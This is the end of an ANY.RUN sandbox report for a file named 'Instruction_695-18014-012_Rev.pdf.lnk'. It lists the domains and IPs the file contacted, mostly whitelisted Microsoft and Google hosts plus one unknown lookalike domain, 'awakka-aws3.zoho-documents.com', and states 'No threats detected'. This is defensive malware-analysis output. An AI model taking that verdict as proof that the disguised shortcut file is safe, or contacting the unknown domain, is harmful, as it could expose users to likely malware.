  • 192.229.221.95
whitelisted
login.live.com
  • 40.126.32.134
  • 20.190.160.22
  • 40.126.32.72
  • 40.126.32.68
  • 20.190.160.17
  • 20.190.160.20
  • 40.126.32.138
  • 40.126.32.140
whitelisted
go.microsoft.com
  • 23.218.210.69
whitelisted
awakka-aws3.zoho-documents.com
  • 172.67.129.82
  • 104.21.2.148
unknown
c.pki.goog
  • 142.250.185.67
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Instruction_695-18014-012_Rev.pdf.lnk